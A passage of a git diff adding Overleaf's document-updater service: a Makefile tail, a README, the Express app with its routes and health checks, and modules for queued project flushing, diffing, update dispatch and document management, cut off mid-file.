--cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/document-updater/README.md b/services/document-updater/README.md new file mode 100644 index 0000000..2e6f000 --- /dev/null +++ b/services/document-updater/README.md @@ -0,0 +1,12 @@ +overleaf/document-updater +=========================== + +An API for applying incoming updates to documents in real-time. + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. 
+ diff --git a/services/document-updater/app.js b/services/document-updater/app.js new file mode 100644 index 0000000..65c9895 --- /dev/null +++ b/services/document-updater/app.js @@ -0,0 +1,299 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Metrics = require('@overleaf/metrics') +const express = require('express') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +logger.initialize('document-updater') + +logger.logger.addSerializers(require('./app/js/LoggerSerializers')) + +const RedisManager = require('./app/js/RedisManager') +const DispatchManager = require('./app/js/DispatchManager') +const DeleteQueueManager = require('./app/js/DeleteQueueManager') +const Errors = require('./app/js/Errors') +const HttpController = require('./app/js/HttpController') +const mongodb = require('./app/js/mongodb') +const async = require('async') + +const bodyParser = require('body-parser') + +Metrics.event_loop.monitor(logger, 100) +Metrics.open_sockets.monitor() + +const app = express() +app.use(bodyParser.json({ limit: Settings.maxJsonRequestSize })) +Metrics.injectMetricsRoute(app) + +DispatchManager.createAndStartDispatchers(Settings.dispatcherCount) + +app.get('/status', (req, res) => { + if (Settings.shuttingDown) { + return res.sendStatus(503) // Service unavailable + } else { + return res.send('document updater is alive') + } +}) + +const pubsubClient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.pubsub +) +app.get('/health_check/redis', (req, res, next) => { + pubsubClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis health check') + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + }) +}) + +const docUpdaterRedisClient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +app.get('/health_check/redis_cluster', (req, res, next) => { + docUpdaterRedisClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis cluster health check') + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + }) +}) + +app.get('/health_check', (req, res, next) => { + async.series( + [ + cb => { + pubsubClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis health check') + } + cb(error) + }) + }, + cb => { + docUpdaterRedisClient.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed redis cluster health check') + } + cb(error) + }) + }, + cb => { + mongodb.healthCheck(error => { + if (error) { + logger.err({ err: error }, 'failed mongo health check') + } + cb(error) + }) + }, + ], + error => { + if (error) { + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + } + ) +}) + +// record http metrics for the routes below this point +app.use(Metrics.http.monitor(logger)) + +app.param('project_id', (req, res, next, projectId) => { + if (projectId != null && projectId.match(/^[0-9a-f]{24}$/)) { + return next() + } else { + return next(new Error('invalid project id')) + } +}) + +app.param('doc_id', (req, res, next, docId) => { + if (docId != null && docId.match(/^[0-9a-f]{24}$/)) { + return next() + } else { + return next(new Error('invalid doc id')) + } +}) + +// Record requests that come in after we've started shutting down - for investigation. 
+app.use((req, res, next) => { + if (Settings.shuttingDown) { + logger.warn( + { req, timeSinceShutdown: Date.now() - Settings.shutDownTime }, + 'request received after shutting down' + ) + // We don't want keep-alive connections to be kept open when the server is shutting down. + res.set('Connection', 'close') + } + next() +}) + +app.get('/project/:project_id/doc/:doc_id', HttpController.getDoc) +app.get( + '/project/:project_id/doc/:doc_id/comment/:comment_id', + HttpController.getComment +) +app.get('/project/:project_id/doc/:doc_id/peek', HttpController.peekDoc) +// temporarily keep the GET method for backwards compatibility +app.get('/project/:project_id/doc', HttpController.getProjectDocsAndFlushIfOld) +// will migrate to the POST method of get_and_flush_if_old instead +app.post( + '/project/:project_id/get_and_flush_if_old', + HttpController.getProjectDocsAndFlushIfOld +) +app.get( + '/project/:project_id/last_updated_at', + HttpController.getProjectLastUpdatedAt +) +app.post('/project/:project_id/clearState', HttpController.clearProjectState) +app.post('/project/:project_id/doc/:doc_id', HttpController.setDoc) +app.post('/project/:project_id/doc/:doc_id/append', HttpController.appendToDoc) +app.post( + '/project/:project_id/doc/:doc_id/flush', + HttpController.flushDocIfLoaded +) +app.delete('/project/:project_id/doc/:doc_id', HttpController.deleteDoc) +app.delete('/project/:project_id', HttpController.deleteProject) +app.delete('/project', HttpController.deleteMultipleProjects) +app.post('/project/:project_id', HttpController.updateProject) +app.post( + '/project/:project_id/history/resync', + longerTimeout, + HttpController.resyncProjectHistory +) +app.post('/project/:project_id/flush', HttpController.flushProject) +app.post( + '/project/:project_id/doc/:doc_id/change/:change_id/accept', + HttpController.acceptChanges +) +app.post( + '/project/:project_id/doc/:doc_id/change/accept', + HttpController.acceptChanges +) +app.post( + '/project/:project_id/doc/:doc_id/comment/:comment_id/resolve', + HttpController.resolveComment +) +app.post( + '/project/:project_id/doc/:doc_id/comment/:comment_id/reopen', + HttpController.reopenComment +) +app.delete( + '/project/:project_id/doc/:doc_id/comment/:comment_id', + HttpController.deleteComment +) + +app.post('/project/:project_id/block', HttpController.blockProject) +app.post('/project/:project_id/unblock', HttpController.unblockProject) + +app.get('/flush_queued_projects', HttpController.flushQueuedProjects) + +app.get('/total', (req, res, next) => { + const timer = new Metrics.Timer('http.allDocList') + RedisManager.getCountOfDocsInMemory((err, count) => { + if (err) { + return next(err) + } + timer.done() + res.send({ total: count }) + }) +}) + +app.use((error, req, res, next) => { + if (error instanceof Errors.NotFoundError) { + return res.sendStatus(404) + } else if (error instanceof Errors.OpRangeNotAvailableError) { + return res.status(422).json(error.info) + } else if (error instanceof Errors.FileTooLargeError) { + return res.sendStatus(413) + } else if (error.statusCode === 413) { + return res.status(413).send('request entity too large') + } else { + logger.error({ err: error, req }, 'request errored') + return res.status(500).send('Oops, something went wrong') + } +}) + +const shutdownCleanly = signal => () => { + logger.info({ signal }, 'received interrupt, cleaning up') + if (Settings.shuttingDown) { + logger.warn({ signal }, 'already shutting down, ignoring interrupt') + return + } + Settings.shuttingDown = true + // record 
the time we started shutting down + Settings.shutDownTime = Date.now() + setTimeout(() => { + logger.info({ signal }, 'shutting down') + process.exit() + }, Settings.gracefulShutdownDelayInMs) +} + +const watchForEvent = eventName => { + docUpdaterRedisClient.on(eventName, e => { + console.log(`redis event: ${eventName} ${e}`) // eslint-disable-line no-console + }) +} + +const events = ['connect', 'ready', 'error', 'close', 'reconnecting', 'end'] +for (const eventName of events) { + watchForEvent(eventName) +} + +const port = + Settings.internal.documentupdater.port || + (Settings.api && + Settings.api.documentupdater && + Settings.api.documentupdater.port) || + 3003 +const host = Settings.internal.documentupdater.host || '127.0.0.1' + +if (!module.parent) { + // Called directly + mongodb.mongoClient + .connect() + .then(() => { + app.listen(port, host, function (err) { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.info( + `Document-updater starting up, listening on ${host}:${port}` + ) + if (Settings.continuousBackgroundFlush) { + logger.info('Starting continuous background flush') + DeleteQueueManager.startBackgroundFlush() + } + }) + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) +} + +module.exports = app + +for (const signal of [ + 'SIGINT', + 'SIGHUP', + 'SIGQUIT', + 'SIGUSR1', + 'SIGUSR2', + 'SIGTERM', + 'SIGABRT', +]) { + process.on(signal, shutdownCleanly(signal)) +} + +function longerTimeout(req, res, next) { + res.setTimeout(6 * 60 * 1000) + next() +} diff --git a/services/document-updater/app/js/DeleteQueueManager.js b/services/document-updater/app/js/DeleteQueueManager.js new file mode 100644 index 0000000..39fa275 --- /dev/null +++ b/services/document-updater/app/js/DeleteQueueManager.js @@ -0,0 +1,145 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let DeleteQueueManager +const Settings = require('@overleaf/settings') +const RedisManager = require('./RedisManager') +const ProjectManager = require('./ProjectManager') +const logger = require('@overleaf/logger') +const metrics = require('./Metrics') + +// Maintain a sorted set of project flushAndDelete requests, ordered by timestamp +// (ZADD), and process them from oldest to newest. A flushAndDelete request comes +// from real-time and is triggered when a user leaves a project. +// +// The aim is to remove the project from redis 5 minutes after the last request +// if there has been no activity (document updates) in that time. If there is +// activity we can expect a further flushAndDelete request when the editing user +// leaves the project. +// +// If a new flushAndDelete request comes in while an existing request is already +// in the queue we update the timestamp as we can postpone flushing further. +// +// Documents are processed by checking the queue, seeing if the first entry is +// older than 5 minutes, and popping it from the queue in that case. 
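+//
+// In redis terms the queue is roughly the following (a sketch only; the key
+// name here is illustrative, the real key schema lives in the redis settings):
+//
+//   ZADD flush-queue <timestamp> <project-id>      -- queue or postpone a flush
+//   ZRANGEBYSCORE flush-queue 0 <cutoff> LIMIT 0 1 -- peek the oldest entry
+//   ZREM flush-queue <project-id>                  -- pop it once processed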
+ +module.exports = DeleteQueueManager = { + flushAndDeleteOldProjects(options, callback) { + const startTime = Date.now() + const cutoffTime = + startTime - options.min_delete_age + 100 * (Math.random() - 0.5) + let count = 0 + + const flushProjectIfNotModified = (projectId, flushTimestamp, cb) => + ProjectManager.getProjectDocsTimestamps( + projectId, + function (err, timestamps) { + if (err != null) { + return callback(err) + } + if (timestamps.length === 0) { + logger.debug( + { projectId }, + 'skipping flush of queued project - no timestamps' + ) + return cb() + } + // are any of the timestamps newer than the time the project was flushed? + for (const timestamp of Array.from(timestamps)) { + if (timestamp > flushTimestamp) { + metrics.inc('queued-delete-skipped') + logger.debug( + { projectId, timestamps, flushTimestamp }, + 'found newer timestamp, will skip delete' + ) + return cb() + } + } + logger.debug({ projectId, flushTimestamp }, 'flushing queued project') + return ProjectManager.flushAndDeleteProjectWithLocks( + projectId, + { skip_history_flush: false }, + function (err) { + if (err != null) { + logger.err({ projectId, err }, 'error flushing queued project') + } + metrics.inc('queued-delete-completed') + return cb(null, true) + } + ) + } + ) + + function flushNextProject() { + const now = Date.now() + if (now - startTime > options.timeout) { + logger.debug('hit time limit on flushing old projects') + return callback(null, count) + } + if (count > options.limit) { + logger.debug('hit count limit on flushing old projects') + return callback(null, count) + } + return RedisManager.getNextProjectToFlushAndDelete( + cutoffTime, + function (err, projectId, flushTimestamp, queueLength) { + if (err != null) { + return callback(err, count) + } + if (projectId == null) { + return callback(null, count) + } + logger.debug({ projectId, queueLength }, 'flushing queued project') + metrics.globalGauge('queued-flush-backlog', queueLength) + return flushProjectIfNotModified( + projectId, + flushTimestamp, + function (err, flushed) { + if (err) { + // Do not stop processing the queue in case the flush fails. + // Slowing down the processing can fill up redis. + metrics.inc('queued-delete-error') + } + if (flushed) { + count++ + } + return flushNextProject() + } + ) + } + ) + } + + return flushNextProject() + }, + + startBackgroundFlush() { + const SHORT_DELAY = 10 + const LONG_DELAY = 1000 + function doFlush() { + if (Settings.shuttingDown) { + logger.info('discontinuing background flush due to shutdown') + return + } + return DeleteQueueManager.flushAndDeleteOldProjects( + { + timeout: 1000, + min_delete_age: 3 * 60 * 1000, + limit: 1000, // high value, to ensure we always flush enough projects + }, + (_err, flushed) => + setTimeout(doFlush, flushed > 10 ? 
SHORT_DELAY : LONG_DELAY) + ) + } + return doFlush() + }, +} diff --git a/services/document-updater/app/js/DiffCodec.js b/services/document-updater/app/js/DiffCodec.js new file mode 100644 index 0000000..245903c --- /dev/null +++ b/services/document-updater/app/js/DiffCodec.js @@ -0,0 +1,40 @@ +const DMP = require('diff-match-patch') +const dmp = new DMP() + +// Do not attempt to produce a diff for more than 100ms +dmp.Diff_Timeout = 0.1 + +module.exports = { + ADDED: 1, + REMOVED: -1, + UNCHANGED: 0, + + diffAsShareJsOp(before, after) { + const diffs = dmp.diff_main(before.join('\n'), after.join('\n')) + dmp.diff_cleanupSemantic(diffs) + + const ops = [] + let position = 0 + for (const diff of diffs) { + const type = diff[0] + const content = diff[1] + if (type === this.ADDED) { + ops.push({ + i: content, + p: position, + }) + position += content.length + } else if (type === this.REMOVED) { + ops.push({ + d: content, + p: position, + }) + } else if (type === this.UNCHANGED) { + position += content.length + } else { + throw new Error('Unknown type') + } + } + return ops + }, +} diff --git a/services/document-updater/app/js/DispatchManager.js b/services/document-updater/app/js/DispatchManager.js new file mode 100644 index 0000000..95ac03b --- /dev/null +++ b/services/document-updater/app/js/DispatchManager.js @@ -0,0 +1,112 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS202: Simplify dynamic range loops + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let DispatchManager +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Keys = require('./UpdateKeys') +const redis = require('@overleaf/redis-wrapper') +const Errors = require('./Errors') +const _ = require('lodash') + +const UpdateManager = require('./UpdateManager') +const Metrics = require('./Metrics') +const RateLimitManager = require('./RateLimitManager') + +module.exports = DispatchManager = { + createDispatcher(RateLimiter, queueShardNumber) { + let pendingListKey + if (queueShardNumber === 0) { + pendingListKey = 'pending-updates-list' + } else { + pendingListKey = `pending-updates-list-${queueShardNumber}` + } + + const client = redis.createClient(Settings.redis.documentupdater) + const worker = { + client, + _waitForUpdateThenDispatchWorker(callback) { + if (callback == null) { + callback = function () {} + } + const timer = new Metrics.Timer('worker.waiting') + return worker.client.blpop(pendingListKey, 0, function (error, result) { + logger.debug(`getting ${queueShardNumber}`, error, result) + timer.done() + if (error != null) { + return callback(error) + } + if (result == null) { + return callback() + } + const [listName, docKey] = Array.from(result) + const [projectId, docId] = Array.from( + Keys.splitProjectIdAndDocId(docKey) + ) + // Dispatch this in the background + const backgroundTask = cb => + UpdateManager.processOutstandingUpdatesWithLock( + projectId, + docId, + function (error) { + // log everything except OpRangeNotAvailable errors, these are normal + if (error != null) { + // downgrade OpRangeNotAvailable and "Delete component" errors so they are not sent to 
sentry + const logAsDebug = + error instanceof Errors.OpRangeNotAvailableError || + error instanceof Errors.DeleteMismatchError + if (logAsDebug) { + logger.debug( + { err: error, projectId, docId }, + 'error processing update' + ) + } else { + logger.error( + { err: error, projectId, docId }, + 'error processing update' + ) + } + } + return cb() + } + ) + return RateLimiter.run(backgroundTask, callback) + }) + }, + + run() { + if (Settings.shuttingDown) { + return + } + return worker._waitForUpdateThenDispatchWorker(error => { + if (error != null) { + logger.error({ err: error }, 'Error in worker process') + throw error + } else { + return worker.run() + } + }) + }, + } + + return worker + }, + + createAndStartDispatchers(number) { + const RateLimiter = new RateLimitManager(number) + _.times(number, function (shardNumber) { + return DispatchManager.createDispatcher(RateLimiter, shardNumber).run() + }) + }, +} diff --git a/services/document-updater/app/js/DocumentManager.js b/services/document-updater/app/js/DocumentManager.js new file mode 100644 index 0000000..540a8a2 --- /dev/null +++ b/services/document-updater/app/js/DocumentManager.js @@ -0,0 +1,708 @@ +const { callbackifyAll } = require('@overleaf/promise-utils') +const RedisManager = require('./RedisManager') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const PersistenceManager = require('./PersistenceManager') +const DiffCodec = require('./DiffCodec') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const HistoryManager = require('./HistoryManager') +const Errors = require('./Errors') +const RangesManager = require('./RangesManager') +const { extractOriginOrSource } = require('./Utils') +const { getTotalSizeOfLines } = require('./Limits') +const Settings = require('@overleaf/settings') + +const MAX_UNFLUSHED_AGE = 300 * 1000 // 5 mins, document should be flushed to mongo this time after a change + +const DocumentManager = { + async getDoc(projectId, docId) { + const { + lines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + unflushedTime, + historyRangesSupport, + } = await RedisManager.promises.getDoc(projectId, docId) + if (lines == null || version == null) { + logger.debug( + { projectId, docId }, + 'doc not in redis so getting from persistence API' + ) + const { + lines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + historyRangesSupport, + } = await PersistenceManager.promises.getDoc(projectId, docId) + logger.debug( + { + projectId, + docId, + lines, + ranges, + resolvedCommentIds, + version, + pathname, + projectHistoryId, + historyRangesSupport, + }, + 'got doc from persistence API' + ) + await RedisManager.promises.putDocInMemory( + projectId, + docId, + lines, + version, + ranges, + resolvedCommentIds, + pathname, + projectHistoryId, + historyRangesSupport + ) + return { + lines, + version, + ranges: ranges || {}, + resolvedCommentIds, + pathname, + projectHistoryId, + unflushedTime: null, + alreadyLoaded: false, + historyRangesSupport, + } + } else { + return { + lines, + version, + ranges, + pathname, + projectHistoryId, + resolvedCommentIds, + unflushedTime, + alreadyLoaded: true, + historyRangesSupport, + } + } + }, + + async getDocAndRecentOps(projectId, docId, fromVersion) { + const { lines, version, ranges, pathname, projectHistoryId } = + await DocumentManager.getDoc(projectId, docId) + + if (fromVersion === -1) { + return { lines, version, ops: [], ranges, pathname, projectHistoryId } + } 
else { + const ops = await RedisManager.promises.getPreviousDocOps( + docId, + fromVersion, + version + ) + return { + lines, + version, + ops, + ranges, + pathname, + projectHistoryId, + } + } + }, + + async appendToDoc(projectId, docId, linesToAppend, originOrSource, userId) { + const { lines: currentLines } = await DocumentManager.getDoc( + projectId, + docId + ) + const currentLineSize = getTotalSizeOfLines(currentLines) + const addedSize = getTotalSizeOfLines(linesToAppend) + const newlineSize = '\n'.length + + if (currentLineSize + newlineSize + addedSize > Settings.max_doc_length) { + throw new Errors.FileTooLargeError( + 'doc would become too large if appending this text' + ) + } + + return await DocumentManager.setDoc( + projectId, + docId, + currentLines.concat(linesToAppend), + originOrSource, + userId, + false, + false + ) + }, + + async setDoc( + projectId, + docId, + newLines, + originOrSource, + userId, + undoing, + external + ) { + if (newLines == null) { + throw new Error('No lines were provided to setDoc') + } + + const UpdateManager = require('./UpdateManager') + const { + lines: oldLines, + version, + alreadyLoaded, + } = await DocumentManager.getDoc(projectId, docId) + + if (oldLines != null && oldLines.length > 0 && oldLines[0].text != null) { + logger.debug( + { docId, projectId, oldLines, newLines }, + 'document is JSON so not updating' + ) + return + } + + logger.debug( + { docId, projectId, oldLines, newLines }, + 'setting a document via http' + ) + const op = DiffCodec.diffAsShareJsOp(oldLines, newLines) + if (undoing) { + for (const o of op || []) { + o.u = true + } // Turn on undo flag for each op for track changes + } + + const { origin, source } = extractOriginOrSource(originOrSource) + + const update = { + doc: docId, + op, + v: version, + meta: { + user_id: userId, + }, + } + if (external) { + update.meta.type = 'external' + } + if (origin) { + update.meta.origin = origin + } else if (source) { + update.meta.source = source + } + // Keep track of external updates, whether they are for live documents + // (flush) or unloaded documents (evict), and whether the update is a no-op. + Metrics.inc('external-update', 1, { + status: op.length > 0 ? 'diff' : 'noop', + method: alreadyLoaded ? 'flush' : 'evict', + path: source, + }) + + // Do not notify the frontend about a noop update. + // We still want to execute the code below + // to evict the doc if we loaded it into redis for + // this update, otherwise the doc would never be + // removed from redis. + if (op.length > 0) { + await UpdateManager.promises.applyUpdate(projectId, docId, update) + } + + // If the document was loaded already, then someone has it open + // in a project, and the usual flushing mechanism will happen. + // Otherwise we should remove it immediately since nothing else + // is using it. 
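+    // (This is the same flush/evict distinction recorded in the 'method'
+    // label of the external-update metric above.)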
+ if (alreadyLoaded) { + return await DocumentManager.flushDocIfLoaded(projectId, docId) + } else { + try { + return await DocumentManager.flushAndDeleteDoc(projectId, docId, {}) + } finally { + // There is no harm in flushing project history if the previous + // call failed and sometimes it is required + HistoryManager.flushProjectChangesAsync(projectId) + } + } + }, + + async flushDocIfLoaded(projectId, docId) { + const { + lines, + version, + ranges, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + } = await RedisManager.promises.getDoc(projectId, docId) + if (lines == null || version == null) { + Metrics.inc('flush-doc-if-loaded', 1, { status: 'not-loaded' }) + logger.debug({ projectId, docId }, 'doc is not loaded so not flushing') + // TODO: return a flag to bail out, as we go on to remove doc from memory? + return + } else if (unflushedTime == null) { + Metrics.inc('flush-doc-if-loaded', 1, { status: 'unmodified' }) + logger.debug({ projectId, docId }, 'doc is not modified so not flushing') + return + } + + logger.debug({ projectId, docId, version }, 'flushing doc') + Metrics.inc('flush-doc-if-loaded', 1, { status: 'modified' }) + const result = await PersistenceManager.promises.setDoc( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy || null + ) + await RedisManager.promises.clearUnflushedTime(docId) + return result + }, + + async flushAndDeleteDoc(projectId, docId, options) { + let result + try { + result = await DocumentManager.flushDocIfLoaded(projectId, docId) + } catch (error) { + if (options.ignoreFlushErrors) { + logger.warn( + { projectId, docId, err: error }, + 'ignoring flush error while deleting document' + ) + } else { + throw error + } + } + + await RedisManager.promises.removeDocFromMemory(projectId, docId) + return result + }, + + async acceptChanges(projectId, docId, changeIds) { + if (changeIds == null) { + changeIds = [] + } + + const { + lines, + version, + ranges, + pathname, + projectHistoryId, + historyRangesSupport, + } = await DocumentManager.getDoc(projectId, docId) + if (lines == null || version == null) { + throw new Errors.NotFoundError(`document not found: ${docId}`) + } + + const newRanges = RangesManager.acceptChanges( + projectId, + docId, + changeIds, + ranges, + lines + ) + + await RedisManager.promises.updateDocument( + projectId, + docId, + lines, + version, + [], + newRanges, + {} + ) + + if (historyRangesSupport) { + const historyUpdates = RangesManager.getHistoryUpdatesForAcceptedChanges({ + docId, + acceptedChangeIds: changeIds, + changes: ranges.changes || [], + lines, + pathname, + projectHistoryId, + }) + + if (historyUpdates.length === 0) { + return + } + + await ProjectHistoryRedisManager.promises.queueOps( + projectId, + ...historyUpdates.map(op => JSON.stringify(op)) + ) + } + }, + + async updateCommentState(projectId, docId, commentId, userId, resolved) { + const { lines, version, pathname, historyRangesSupport } = + await DocumentManager.getDoc(projectId, docId) + + if (lines == null || version == null) { + throw new Errors.NotFoundError(`document not found: ${docId}`) + } + + if (historyRangesSupport) { + await RedisManager.promises.updateCommentState(docId, commentId, resolved) + + await ProjectHistoryRedisManager.promises.queueOps( + projectId, + JSON.stringify({ + pathname, + commentId, + resolved, + meta: { + ts: new Date(), + user_id: userId, + }, + }) + ) + } + }, + + async getComment(projectId, docId, commentId) { + const { ranges } = await DocumentManager.getDoc(projectId, docId) + + 
const comment = ranges?.comments?.find(comment => comment.id === commentId)
+
+    if (!comment) {
+      throw new Errors.NotFoundError({
+        message: 'comment not found',
+        info: { commentId },
+      })
+    }
+
+    return { comment }
+  },
+
+  async deleteComment(projectId, docId, commentId, userId) {
+    const { lines, version, ranges, pathname, historyRangesSupport } =
+      await DocumentManager.getDoc(projectId, docId)
+    if (lines == null || version == null) {
+      throw new Errors.NotFoundError(`document not found: ${docId}`)
+    }
+
+    const newRanges = RangesManager.deleteComment(commentId, ranges)
+
+    await RedisManager.promises.updateDocument(
+      projectId,
+      docId,
+      lines,
+      version,
+      [],
+      newRanges,
+      {}
+    )
+
+    if (historyRangesSupport) {
+      await RedisManager.promises.updateCommentState(docId, commentId, false)
+      await ProjectHistoryRedisManager.promises.queueOps(
+        projectId,
+        JSON.stringify({
+          pathname,
+          deleteComment: commentId,
+          meta: {
+            ts: new Date(),
+            user_id: userId,
+          },
+        })
+      )
+    }
+  },
+
+  async renameDoc(projectId, docId, userId, update, projectHistoryId) {
+    await RedisManager.promises.renameDoc(
+      projectId,
+      docId,
+      userId,
+      update,
+      projectHistoryId
+    )
+  },
+
+  async getDocAndFlushIfOld(projectId, docId) {
+    const { lines, version, unflushedTime, alreadyLoaded } =
+      await DocumentManager.getDoc(projectId, docId)
+
+    // if doc was already loaded see if it needs to be flushed
+    if (
+      alreadyLoaded &&
+      unflushedTime != null &&
+      Date.now() - unflushedTime > MAX_UNFLUSHED_AGE
+    ) {
+      await DocumentManager.flushDocIfLoaded(projectId, docId)
+    }
+
+    return { lines, version }
+  },
+
+  async resyncDocContents(projectId, docId, path, opts = {}) {
+    logger.debug({ projectId, docId, path }, 'start resyncing doc contents')
+    let {
+      lines,
+      ranges,
+      resolvedCommentIds,
+      version,
+      projectHistoryId,
+      historyRangesSupport,
+    } = await RedisManager.promises.getDoc(projectId, docId)
+
+    // To avoid issues where the same docId appears with different paths,
+    // we use the path from the resyncProjectStructure update. If we used
+    // the path from the getDoc call to web then the two occurrences of the
+    // docId would map to the same path, and this would be rejected by
+    // project-history as an unexpected resyncDocContent update.
+    if (lines == null || version == null) {
+      logger.debug(
+        { projectId, docId },
+        'resyncing doc contents - not found in redis - retrieving from web'
+      )
+      ;({
+        lines,
+        ranges,
+        resolvedCommentIds,
+        version,
+        projectHistoryId,
+        historyRangesSupport,
+      } = await PersistenceManager.promises.getDoc(projectId, docId, {
+        peek: true,
+      }))
+    } else {
+      logger.debug(
+        { projectId, docId },
+        'resyncing doc contents - doc in redis - will queue in redis'
+      )
+    }
+
+    if (opts.historyRangesMigration) {
+      historyRangesSupport = opts.historyRangesMigration === 'forwards'
+    }
+
+    await ProjectHistoryRedisManager.promises.queueResyncDocContent(
+      projectId,
+      projectHistoryId,
+      docId,
+      lines,
+      ranges ?? 
{}, + resolvedCommentIds, + version, + // use the path from the resyncProjectStructure update + path, + historyRangesSupport + ) + + if (opts.historyRangesMigration) { + await RedisManager.promises.setHistoryRangesSupportFlag( + docId, + historyRangesSupport + ) + } + }, + + async getDocWithLock(projectId, docId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getDoc, + projectId, + docId + ) + }, + + async getCommentWithLock(projectId, docId, commentId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getComment, + projectId, + docId, + commentId + ) + }, + + async getDocAndRecentOpsWithLock(projectId, docId, fromVersion) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getDocAndRecentOps, + projectId, + docId, + fromVersion + ) + }, + + async getDocAndFlushIfOldWithLock(projectId, docId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.getDocAndFlushIfOld, + projectId, + docId + ) + }, + + async setDocWithLock( + projectId, + docId, + lines, + source, + userId, + undoing, + external + ) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.setDoc, + projectId, + docId, + lines, + source, + userId, + undoing, + external + ) + }, + + async appendToDocWithLock(projectId, docId, lines, source, userId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.appendToDoc, + projectId, + docId, + lines, + source, + userId + ) + }, + + async flushDocIfLoadedWithLock(projectId, docId) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.flushDocIfLoaded, + projectId, + docId + ) + }, + + async flushAndDeleteDocWithLock(projectId, docId, options) { + const UpdateManager = require('./UpdateManager') + return await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.flushAndDeleteDoc, + projectId, + docId, + options + ) + }, + + async acceptChangesWithLock(projectId, docId, changeIds) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.acceptChanges, + projectId, + docId, + changeIds + ) + }, + + async updateCommentStateWithLock( + projectId, + docId, + threadId, + userId, + resolved + ) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.updateCommentState, + projectId, + docId, + threadId, + userId, + resolved + ) + }, + + async deleteCommentWithLock(projectId, docId, threadId, userId) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.deleteComment, + projectId, + docId, + threadId, + userId + ) + }, + + async renameDocWithLock(projectId, docId, userId, update, projectHistoryId) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + DocumentManager.renameDoc, + projectId, + docId, + userId, + update, + projectHistoryId + ) + }, + + async resyncDocContentsWithLock(projectId, docId, path, opts) { + const UpdateManager = require('./UpdateManager') + await UpdateManager.promises.lockUpdatesAndDo( + 
